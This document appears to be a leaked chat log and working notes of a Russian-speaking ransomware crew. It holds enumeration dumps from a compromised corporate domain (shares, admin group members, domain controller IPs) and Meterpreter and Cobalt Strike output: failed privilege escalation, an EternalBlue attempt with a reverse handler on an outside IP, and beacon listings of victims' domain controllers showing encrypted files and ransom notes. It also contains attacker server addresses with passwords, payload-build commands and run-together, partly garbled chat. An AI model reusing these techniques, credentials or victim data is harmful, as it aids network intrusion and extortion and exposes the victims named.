\\USCHI-APG004.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-APG004.Hobbes.loc\print$ - Printer Drivers
\\USCHI-DCG002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG002.Hobbes.loc\C$ - Default share
\\USCHI-DCG002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG002.Hobbes.loc\print$ - Printer Drivers
\\PCHIWSG005.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG005.Hobbes.loc\AM -
\\PCHIWSG005.Hobbes.loc\AMM3EXT$ - BC-Meridian Extensions Share
\\PCHIWSG005.Hobbes.loc\C$ - Default share
\\PCHIWSG005.Hobbes.loc\F$ - Default share
\\PCHIWSG005.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG016.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG016.Hobbes.loc\C$ - Default share
\\PCHIAPG016.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG016.Hobbes.loc\SophosUpdate -
\\PCHIAPG016.Hobbes.loc\SUMInstallSet - Sophos Update Manager Installer
\\USCHI-PWD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PWD001.Hobbes.loc\C$ - Default share
\\USCHI-PWD001.Hobbes.loc\E$ - Default share
\\USCHI-PWD001.Hobbes.loc\F$ - Default share
\\USCHI-PWD001.Hobbes.loc\G$ - Default share
\\USCHI-PWD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCP001.Hobbes.loc\C$ - Default share
\\USCHI-DCP001.Hobbes.loc\DAG01.hobbes.loc - File share witness created for microsoft exchange database availability group DAG01.
\\USCHI-DCP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCP001.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCP001.Hobbes.loc\SYSVOL - Logon server share
\\PCHIAPG014.Hobbes.loc\ActiveAdministrator - Active Administrator Server Share
\\PCHIAPG014.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG014.Hobbes.loc\BEW-4ecbc619f6de49a39b3bda9cec5b9074 - Push Directory
\\PCHIAPG014.Hobbes.loc\C$ - Default share
\\PCHIAPG014.Hobbes.loc\DADevicePolicyMaster$ - DADevicePolicyMaster$ share
\\PCHIAPG014.Hobbes.loc\E$ - Default share
\\PCHIAPG014.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG014.Hobbes.loc\Logs$ - Logs$ share
\\PCHIAPG014.Hobbes.loc\SLDAClient$ - SLDAClient$ share
\\PCHIAPG014.Hobbes.loc\Slogic$ - \\PCHIAPG014\SLOGIC$ share
\\PCHIAPG014.Hobbes.loc\SLscripts$ - SLscripts$ share
\\PCHIWSG007.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG007.Hobbes.loc\C$ - Default share
\\PCHIWSG007.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG003.Hobbes.loc\C$ - Default share
\\USCHI-DCG003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG003.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCG003.Hobbes.loc\SYSVOL - Logon server share
\\USCHI-BKP001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-BKP001.Hobbes.loc\C$ - Default share
\\USCHI-BKP001.Hobbes.loc\D$ - Default share
\\USCHI-BKP001.Hobbes.loc\E$ - Default share
\\USCHI-BKP001.Hobbes.loc\F$ - Default share
\\USCHI-BKP001.Hobbes.loc\G$ - Default share
\\USCHI-BKP001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-BKP001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-PRT001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PRT001.Hobbes.loc\C$ - Default share
\\USCHI-PRT001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-PRT001.Hobbes.loc\print$ - Printer Drivers
\\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300 - Plotters NAME should not contain "_" per vendor recommendation
\\USCHI-PRT001.Hobbes.loc\USCHI-PL_OCECW300_PS - USCHI-PL_OCECW300_PS
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045 - South - Canon iR-ADV C5045/5051 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5045_PS - South - Canon iR-ADV C50455051 PS3
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255 - North - Canon iR-ADV C5250/5255 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_C5255_PS - North - Canon iR-ADV C52505 PS3
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530 - South - HP Color LaserJet CM3530
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCM3530_PS - South - HP Color LaserJet CM3530 PS
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525 - HR Area - HP Color LaserJet CP3525 PCL6
\\USCHI-PRT001.Hobbes.loc\USCHI-PT_HPCP3525_PS - HR Area - HP Color LaserJet CP3525 PS
\\USCHI-MAXD001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MAXD001.Hobbes.loc\C$ - Default share
\\USCHI-MAXD001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MAXD001.Hobbes.loc\M$ - Default share
\\USCHI-MSE003.Hobbes.loc\address -
\\USCHI-MSE003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE003.Hobbes.loc\C$ - Default share
\\USCHI-MSE003.Hobbes.loc\E$ - Default share
\\USCHI-MSE003.Hobbes.loc\F$ - Default share
\\USCHI-MSE003.Hobbes.loc\G$ - Default share
\\USCHI-MSE003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SQL001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SQL001.Hobbes.loc\C$ - Default share
\\USCHI-SQL001.Hobbes.loc\E$ - Default share
\\USCHI-SQL001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SQL001.Hobbes.loc\print$ - Printer Drivers
\\DT-000037.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000037.Hobbes.loc\C$ - Default share
\\DT-000037.Hobbes.loc\IPC$ - Remote IPC
\\PCHIWSG006.Hobbes.loc\70182862-e52d-4fb0-bea2-3448c35de88f-query-0 - Used by Microsoft Search Server 2010 to copy index files between servers.
\\PCHIWSG006.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIWSG006.Hobbes.loc\C$ - Default share
\\PCHIWSG006.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-MSE002.Hobbes.loc\address -
\\USCHI-MSE002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-MSE002.Hobbes.loc\C$ - Default share
\\USCHI-MSE002.Hobbes.loc\E$ - Default share
\\USCHI-MSE002.Hobbes.loc\F$ - Default share
\\USCHI-MSE002.Hobbes.loc\G$ - Default share
\\USCHI-MSE002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-DCG001.Hobbes.loc\C$ - Default share
\\USCHI-DCG001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-DCG001.Hobbes.loc\NETLOGON - Logon server share
\\USCHI-DCG001.Hobbes.loc\SYSVOL - Logon server share
\\PCHIDCG004.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIDCG004.Hobbes.loc\C$ - Default share
\\PCHIDCG004.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG004.Hobbes.loc\NETLOGON - Logon server share
\\PCHIDCG004.Hobbes.loc\slETL$ -
\\PCHIDCG004.Hobbes.loc\SYSVOL - Logon server share
\\USCHI-LSS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-LSS001.Hobbes.loc\C$ - Default share
\\USCHI-LSS001.Hobbes.loc\Extreme_Loading_for_Structures - Extreme Loading┬" for Structures
\\USCHI-LSS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SPS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SPS001.Hobbes.loc\Analytics_8bda09f0-8cbc-4c38-8854-922eb0553239 -
\\USCHI-SPS001.Hobbes.loc\C$ - Default share
\\USCHI-SPS001.Hobbes.loc\E$ - Default share
\\USCHI-SPS001.Hobbes.loc\gthrsvc_8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0 - Crawled Files Share8bda09f0-8cbc-4c38-8854-922eb0553239-crawl-0
\\USCHI-SPS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NWA001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NWA001.Hobbes.loc\C$ - Default share
\\USCHI-NWA001.Hobbes.loc\E$ - Default share
\\USCHI-NWA001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NWA001.Hobbes.loc\KC$ -
\\USCHI-NWA001.Hobbes.loc\Netwrix_Auditor_Subscriptions$ - This is a default share for uploading Netwrix Auditor subscriptions.
\\USCHI-NWA001.Hobbes.loc\Netwrix_UAVR$ - This share contains audit data on user activity collected by Netwrix Auditor.
\\USCHI-NWA001.Hobbes.loc\print$ - Printer Drivers
\\LT-000108.Hobbes.loc\ADMIN$ - Remote Admin
\\LT-000108.Hobbes.loc\C$ - Default share
\\LT-000108.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-VHH010.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-VHH010.Hobbes.loc\C$ - Default share
\\USCHI-VHH010.Hobbes.loc\E$ - Default share
\\USCHI-VHH010.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG003.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIDCG003.Hobbes.loc\C$ - Default share
\\PCHIDCG003.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG003.Hobbes.loc\NETLOGON - Logon server share
\\PCHIDCG003.Hobbes.loc\slETL$ -
\\PCHIDCG003.Hobbes.loc\SYSVOL - Logon server share
\\PCHIAPG011.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG011.Hobbes.loc\C$ - Default share
\\PCHIAPG011.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG011.Hobbes.loc\Lenel$ -
\\USCHI-PWA001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PWA001.Hobbes.loc\C$ - Default share
\\USCHI-PWA001.Hobbes.loc\E$ - Default share
\\USCHI-PWA001.Hobbes.loc\F$ - Default share
\\USCHI-PWA001.Hobbes.loc\G$ - Default share
\\USCHI-PWA001.Hobbes.loc\H$ - Default share
\\USCHI-PWA001.Hobbes.loc\IPC$ - Remote IPC
\\DAG01.Hobbes.loc\ClusterStorage$ - Cluster Shared Volumes Default Share
\\DAG01.Hobbes.loc\IPC$ - Remote IPC
\\DT-000033.Hobbes.loc\A$ - Default share
\\DT-000033.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000033.Hobbes.loc\C$ - Default share
\\DT-000033.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\ActiveInk -
\\SQL0005.Hobbes.loc\ADMIN$ - Remote Admin
\\SQL0005.Hobbes.loc\C$ - Default share
\\SQL0005.Hobbes.loc\E$ - Default share
\\SQL0005.Hobbes.loc\F$ - Default share
\\SQL0005.Hobbes.loc\G$ - Default share
\\SQL0005.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\Temp -
\\USCHI-WSUS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-WSUS001.Hobbes.loc\C$ - Default share
\\USCHI-WSUS001.Hobbes.loc\E$ - Default share
\\USCHI-WSUS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-WSUS001.Hobbes.loc\UpdateServicesPackages - A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
\\USCHI-WSUS001.Hobbes.loc\WsusContent - A network share to be used by Local Publishing to place published content on this WSUS system.
\\USCHI-WSUS001.Hobbes.loc\WSUSTemp - A network share used by Local Publishing from a Remote WSUS Console Instance.
\\USCHI-NET002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET002.Hobbes.loc\AdminUIContentPayload - AdminUIContentPayload share for AdminUIContent Packages
\\USCHI-NET002.Hobbes.loc\C$ - Default share
\\USCHI-NET002.Hobbes.loc\Client -
\\USCHI-NET002.Hobbes.loc\D -
\\USCHI-NET002.Hobbes.loc\DeploymentShare$ - MDT Deployment Share
\\USCHI-NET002.Hobbes.loc\Drivers -
\\USCHI-NET002.Hobbes.loc\E$ - Default share
\\USCHI-NET002.Hobbes.loc\EasySetupPayload - EasySetupPayload share for EasySetup Packages
\\USCHI-NET002.Hobbes.loc\F -
\\USCHI-NET002.Hobbes.loc\F$ - Default share
\\USCHI-NET002.Hobbes.loc\ImagesFiles -
\\USCHI-NET002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET002.Hobbes.loc\print$ - Printer Drivers
\\USCHI-NET002.Hobbes.loc\REMINST - RemoteInstallation
\\USCHI-NET002.Hobbes.loc\SCCMContentLib$ - 'Configuration Manager' Content Library for site CHI (3/6/2015)
\\USCHI-NET002.Hobbes.loc\SMPSTOREF_63F684E9$ - SMS SMP Share
\\USCHI-NET002.Hobbes.loc\SMSPKGF$ - SMS Site CHI DP 3/6/2015
\\USCHI-NET002.Hobbes.loc\SMSSIG$ - SMS Site CHI DP 3/6/2015
\\USCHI-NET002.Hobbes.loc\SMS_CHI - SMS Site CHI 09/21/20
\\USCHI-NET002.Hobbes.loc\SMS_CPSC$ - SMS Compressed Package Storage
\\USCHI-NET002.Hobbes.loc\SMS_DP$ - ConfigMgr Site Server DP share
\\USCHI-NET002.Hobbes.loc\SMS_OCM_DATACACHE - OCM inbox directory
\\USCHI-NET002.Hobbes.loc\SMS_SITE - SMS Site CHI 09/21/20
\\USCHI-NET002.Hobbes.loc\SMS_SUIAgent - SMS Software Update Installation Agent -- 09/21/20
\\USCHI-NET002.Hobbes.loc\SourceFiles -
\\USCHI-BKP110.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-BKP110.Hobbes.loc\C$ - Default share
\\USCHI-BKP110.Hobbes.loc\E$ - Default share
\\USCHI-BKP110.Hobbes.loc\F$ - Default share
\\USCHI-BKP110.Hobbes.loc\G$ - Default share
\\USCHI-BKP110.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-BKP110.Hobbes.loc\VBRCatalog -
\\USCHI-CAS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-CAS001.Hobbes.loc\C$ - Default share
\\USCHI-CAS001.Hobbes.loc\CertEnroll - Active Directory Certificate Services share
\\USCHI-CAS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS001.Hobbes.loc\C$ - Default share
\\USCHI-SBS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS001.Hobbes.loc\SkypeShare -
\\USCHI-SBS001.Hobbes.loc\SkypeShare1 -
\\USCHI-SBS001.Hobbes.loc\Users -
\\USCHI-SBS001.Hobbes.loc\xds-replica - Share used for Skype for Business Server replication
\\USCHI-SBS002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS002.Hobbes.loc\C$ - Default share
\\USCHI-SBS002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-EM-LT400.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-EM-LT400.Hobbes.loc\C$ - Default share
\\USCHI-EM-LT400.Hobbes.loc\IPC$ - Remote IPC
\\DT-000025.Hobbes.loc\A$ - Default share
\\DT-000025.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000025.Hobbes.loc\C$ - Default share
\\DT-000025.Hobbes.loc\IPC$ - Remote IPC
\\DT-000025.Hobbes.loc\print$ - Printer Drivers
\\USCHI-SBS003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS003.Hobbes.loc\C$ - Default share
\\USCHI-SBS003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS003.Hobbes.loc\print$ - Printer Drivers
``````
Alias name Administrators
Comment
Members
-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\SUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN
``конфуконфу@tl1``
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
DILBERT MS-0001 RAMIREZJ
SPS19-Admin SPS-DB-2019 SPS-TS-2019
SVC-NWA001
```
```
Domain Controllers:
Server Name IP Address
----------- ----------
PCHIDCG003 10.20.32.100
PCHIDCG004 10.20.32.28
USCHI-DCP001 10.20.32.175
USCHA-DCG002 10.6.0.56
USCHI-DCG003 10.20.32.103
USCHI-DCG001 10.20.32.101
PCHIDCG002 10.111.2.20
``````
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
DILBERT ePOScan Exchange Service
LaiP MITORATJ MS-0001
PCHIAPG009 PCHIAPG014 PCHIDBG001
RAMIREZJ SAVDeploy SCCMadmin
SCOMaction SLADMIN SPS19-Admin
SPS-DB-2019 SPS-TS-2019 SQL0005
SVC-CAS SVC-ESRI SVC-NWA001
SVC-PW-DBG001 SVC-PWORCHFWK SVC-PW-ORCHFWK
SVC-PWPWD001 SVC-Veeam TAGGESE
TENGSERV UREJA USCHIPWA001
USCHIPWD001 USCHIPWW001
``AdFindгоуконфу``
expFederal.com
``и тоже без доменаагавам там еще одна сессия прилетела даже с лау всехправила знаетенапишите логины в личку для админки билдера шелкодаво входной еще сесиятогда ищем впндомен не доступенживаяу меня в кобе висит еще сесиякто снял ад инфо?```
meterpreter > getsystem
[2001: Operation failed: Access is denied. The following was attempted:
[Named Pipe Impersonation (In Memory/Admin)
[Named Pipe Impersonation (Dropper/Admin)
[Token Duplication (In Memory/Admin)
[Named Pipe Impersonation (RPCSS variant)
meterpreter >
[*] 10.0.0.115 - Meterpreter session 7 closed. Reason: Died
``отвалисьработал из входнойхотя мой домен оттуда пингуетсямне эти сессиине летят в кобуи дайте доменснимите ад юзерс+как я вижу он себе пасснулберите в работу ту сетку из кобы вдвоем с @user3ну элевейт эксплойтом получится
а байпасснуть юак - нетчерез елевейту @user7 как-то раз получилось подняться не ЛАчем черт не шутитэто понятно``
Опробовал кучу bypassuac'ов - все ругаются так:
```
когда текущий пользователь не в локал админ группе нет смысла пытаться байпасить юак+``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``домен все еще не резолвится?Много разных кред``
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx
```
Вин серв 2008
Все пользователи, креды от которых есть, находятся на одном компе
ЛА среди них нет
Домен не отзывается
Конфигов ВПН нет
Шар нет
Кредов в txt и тп нет
На MS17 уязвимости нет:
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```
[*] Started reverse TCP handler on 173.234.155.45:9875
[192.168.1.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[192.168.1.190:445 - Scanned 1 of 1 hosts (100% complete)
[192.168.1.190:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
```
Прокинул в метерпретер через мультихендлер:
`getsystem` - мимо
Опробовал кучу bypassuac'ов - все ругаются так:
`Not in admins group, cannot escalate with this module`
Либо так:
`not-vulnerable: Target is not vulnerable`
Попробовал это (This module attempts to exploit existing administrative privileges to obtain a SYSTEM session)
Тоже не шибко помогло:
```
msf6 exploit(windows/local/service_permissions) > exploit
[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services..
[*] [CitrixICAFileSigningService] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\DeliveryServices\ICAFileSigningService\Citrix.DeliveryServices.ICASign.ServiceHost.exe"
[*] [Citrix_GTLicensingProv] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\Licensing\LicWMI\Citrix_GTLicensingProv.exe"
[+] [HipsDaemon] Write access to C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsDaemon.exe
[+] [knbcenter] Write access to D:\Program Files (x86)\liebao\6.5.115.18480\KNBCenter.exe
[*] [TermServLicensing] Cannot reliably determine path: C:\Windows\system32\svchost -k TSLicensing
```батька не оценит этого[ ](https://mediaeveryone.com/channel/general?msg=8aL7r47YQBW2B3L83) я говорил о логинах, паролях, именах, коментах, файлах[ ](https://mediaeveryone.com/channel/general?msg=ugbQDs48KqS6Tt8RW) неаТы говорил о логинах о паролях речи не былоа еще будут?[ ](https://mediaeveryone.com/channel/general?msg=HJkjZDuH55qPtgNXX) да блять я сколько говорил?возьмите в работу3 сесситам 1 сеткада@tl1 разбираем сессии?Смена пароля passwd``
23.106.160.50 p17464
pwd:Lukashenko228!
```пока продолжаем работу по старым задачамтак ладно есть проблемы с кобойДавай лучше на centOS следубщиевсе разобралсяЭто нужно каждый раз делать когда заходишь по ssh`/usr/bin/bash`
укажи в шелКонечноавтоматом получишь хом дир``
useradd -m username --shell "shell path" && passwd username
``пасс задал?создайте пока себе листыбля.... Ты серьезно... Наверно я попробовал прежде чем писать и когда указываешь явно нужно писать вместе с юзером.только имя хом диры, она сама создается в /homeкогда указываешь каталог не надо писать полный путьможно centOS или чистую Deb там такой хуйни не бываетне понимаю что с vds создаю usera с явным указанием каталога useradd -m -d /home/user3
ОтАвторизуюсь в новом терминале и вижу это ```
* Ubuntu 20.04 LTS is out, raising the bar on performance, security,
and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
AWS, Azure and Google Cloud.
https://ubuntu.com/blog/ubuntu-20-04-lts-arrives
0 updates can be installed immediately.
0 of these updates are security updates.
$ ды
-sh: 1: ды: not found
$ ls
$
```
Указываю так mkhomedir_helper user3
тоже не помогает. Проверяю cat /etc/passwd ```
user3:x:1000::/home/user3:/bin/sh
``ждем сессий, разбираем, работаемкоба``
206.221.186.34:44482
pqtbjTVtIMYBudInFs7VVoZDHjDvqtAR1v
```текущие откладываем кроме @user4так переходим дальшеокейшоб не затерялосьможет отдельный канал для фидбэка?по доп модулям - ссылка + причина/описаниеНужно сделать чтоб командами кербы собирались, из коробки работал смбавто брут, была возможность загружать файлы, одной команой снимать адфайнд, одной команой выводить да,ла и прочую нечесть. Это как минимум[ ](https://mediaeveryone.com/channel/general?msg=bDpJ3zLXSYmxHhHrY) PowerView.ps1[ ](https://mediaeveryone.com/channel/general?msg=5yjoSi3NSkCQSnsir) что за превью?[ ](https://mediaeveryone.com/channel/general?msg=crkwCi6fnbuPQTLDW) конкретнее, линки на гит и прочеечто то что привелегии подниметну как минимум туда бы по дефолту повервью встроить[ ](https://mediaeveryone.com/channel/general?msg=dmJFPzMKqLbG5fg9C) ссылки и прочее, что необходимо[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) в основном баги, окей[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) ++Нет возможности скачать файлы с клиентского пк, в птш скачивается(видно Download Files), но от туда не скачивается(открывается новая вкладка - server not found.
Хотелось бы импортировать скрипты напрямую с пк в птш, а не по ссылке.
Проблемы с сокетами - прилетает по две-три сессии. Работешь в одной сесии, пишешь команду, а она дублируется два или три раза, столько же, сколько прилетело сессийинструментарии встроенный мог быть побогаче...ну в кобе это реже в разывряд ли претензия к инструменту, коба в условиях жопы тоже часто мрет или не стучит)оч часто сесии мрут, что есть минус))))так там и кнопка файлов есть .... ммвообще она синяяда, я тоже не смог найти пока не сказали что там естькнопки видимыебаг[ ](https://mediaeveryone.com/channel/general?msg=7djo2SGBKa9nAjEax) про строку сверху?больше нечего сказатьхотелось бы нормальную панель, а не белый прямоугольник
в остальном старался избегать использования и переносил сессию в кобу@all все кто юзал тпш отпишите юзер экспириенс сюда одним большим сообщением, пожалуйста. разделите + и -, что норм и т д, чтобы хотелось. что лишнее. дайте фидбэкстатус пиши в конфу сразуокдая вчера их проверял, повторить?на наличие записки + доступностьна что?проверь все сервера sisd.netя наверно..кто сейчас свободнее?Настрою под msfразверните себе арму там и работайте вместесегодня придется потерпетьОдна на всех это не вариант. В арму подтягивается вся подсеть если сканить. + будет гемор если работать одновременно в арме еще в msfну с того времени опыта у вас прибавилось поэтому можете попробовать еще раз)я уже не помню, у нас изначально одна на всех была. и че то было что по очереди работаликонфликтовать в чем?так вроде конфликтовать будет, если на толпуно там еще и старая отвалилась поэтому пока одна на всехнет. всем нуждающимся в замен старойв смысле это на одного?не забывайте удалять за собой инактив сесси``
23.106.160.50:17464
HJ6Hmf7KNP3w2w7HCtprxRHGg6q92E9LsvWLv98y
``скину сюда доступы, пусть кто-то один настроитвпс под мсф подъехалскину тебе х86 дллстраннодаа у тебя пл х64?`./shellConcatination --source=shellStarter_llvm_x64.dll -keep -self --target=pl64.dll --addBin=pl.bin` так собирал, пайлоад х64 чекчек разрядность системытип х86 ?как собирал и запускал?если бы все прошло успешно доменная авторизация должна была уеретьпочему?плохо(```
beacon> ls \\admindc1\c$
[*] Tasked beacon to list files in \\admindc1\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc1\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 07/10/2020 08:19:50 $Recycle.Bin
dir 12/08/2020 23:30:15 AdminDC1
dir 12/08/2020 23:30:15 batch
dir 12/08/2020 23:30:15 ck-agent
dir 10/26/2018 09:36:07 Documents and Settings
dir 12/08/2020 23:30:15 inetpub
dir 12/08/2020 23:30:16 Logs
dir 12/09/2020 12:27:52 MSI
dir 10/26/2018 13:40:56 PerfLogs
dir 12/08/2020 23:30:16 Program Files
dir 12/09/2020 02:24:43 Program Files (x86)
dir 12/08/2020 23:30:16 ProgramData
dir 12/08/2020 23:30:16 Recovery
dir 12/08/2020 23:30:10 System Volume Information
dir 10/12/2020 15:18:46 temp
dir 12/08/2020 23:30:16 Users
dir 12/02/2020 03:33:28 Windows
dir 12/08/2020 23:30:16 Zabbix_Agent
1kb fil 12/08/2020 23:30:15 AdminDC1.admin.sisd.k12_admindc1(8).req.HWOEU
1kb file 12/08/2020 23:30:15 admindc1.cer.HWOEU
375kb file 07/16/2016 07:18:08 bootmgr
535b thread 12/08/2020 23:30:15 BOOTNXT.HWOEU
16gb file 11/13/2020 07:53:40 pagefile.sys
1kb file 12/08/2020 23:30:15 readme.txt
40mb file 12/09/2020 08:06:26 redcloak.msi
beacon> ls \\admindc2\c$
[*] Tasked beacon to list files in \\admindc2\c$
[+] host called home, sent: 31 bytes
[-] could not open \\admindc2\c$\*: 53
beacon> ls \\admindc3\c$
[*] Tasked beacon to list files in \\admindc3\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc3\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 07/28/2019 07:12:07 $Recycle.Bin
dir 12/08/2020 23:32:07 ck-agent
dir 12/09/2020 02:39:28 Config.Msi
dir 10/26/2018 15:02:45 Documents and Settings
dir 12/08/2020 23:32:08 Logs
dir 10/29/2018 14:52:44 PerfLogs
dir 12/08/2020 23:32:08 Program Files
dir 12/09/2020 02:39:18 Program Files (x86)
dir 12/08/2020 23:32:08 ProgramData
dir 12/08/2020 23:32:08 Recovery
dir 12/08/2020 21:50:51 System Volume Information
dir 12/08/2020 23:32:08 Users
dir 12/02/2020 03:45:13 Windows
dir 12/08/2020 23:32:08 Zabbix_Agent
375kb file 07/16/2016 07:18:08 bootmgr
535b file 12/08/2020 23:32:07 BOOTNXT.HWOEU
16gb file 11/13/2020 16:25:59 pagefile.sys
1kb file 12/08/2020 23:32:07 readme.txt
40mb file 12/09/2020 08:06:26 redcloak.msi
beacon> ls \\admindc4\c$
[*] Tasked beacon to list files in \\admindc4\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc4\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 07/11/2019 13:34:37 $Recycle.Bin
dir 12/08/2020 23:32:33 ck-agent
dir 10/29/2018 09:10:11 Documents and Settings
dir 12/08/2020 23:32:35 Logs
dir 10/29/2018 13:19:55 PerfLogs
dir 12/08/2020 23:32:35 Program Files
dir 12/09/2020 02:41:13 Program Files (x86)
dir 12/08/2020 23:32:35 ProgramData
dir 12/08/2020 23:32:35 Recovery
dir 12/08/2020 23:32:28 System Volume Information
dir 12/08/2020 23:32:35 Users
dir 11/17/2020 13:36:48 Windows
dir 12/08/2020 23:32:35 Zabbix_Agent
375kb file 07/16/2016 07:18:08 bootmgr
535b file 12/08/2020 23:32:33 BOOTNXT.HWOEU
16gb file 11/17/2020 13:46:41 pagefile.sys
1kb file 12/08/2020 23:32:33 readme.txt
40mb file 12/09/2020 08:06:26 redcloak.msi
beacon> ls \\admindc5\c$
[*] Tasked beacon to list files in \\admindc5\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc5\c$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 07/11/2019 13:42:13 $Recycle.Bin
dir 12/08/2020 20:24:33 $SNAP_2020120302_VOLUMEC$
dir 12/08/2020 20:24:33 AdminDC1
dir 12/08/2020 20:24:33 ck-agent
dir 10/29/2018 09:48:27 Documents and Settings
dir 12/08/2020 20:24:33 iboss-ad-installers-110818
dir 12/08/2020 20:24:35 Logs
dir 10/29/2018 14:45:30 PerfLogs
dir 12/08/2020 20:24:35 Program Files
dir 12/09/2020 02:48:53 Program Files (x86)
dir 12/08/2020 20:24:35 ProgramData
dir 12/08/2020 20:24:36 Recovery
dir 12/08/2020 20:24:28 System Volume Information
dir 12/08/2020 20:24:36 Users
dir 12/02/2020 02:48:40 Windows
dir 12/08/2020 20:25:25 Zabbix_Agent
375kb file 07/16/2016 07:18:08 bootmgr
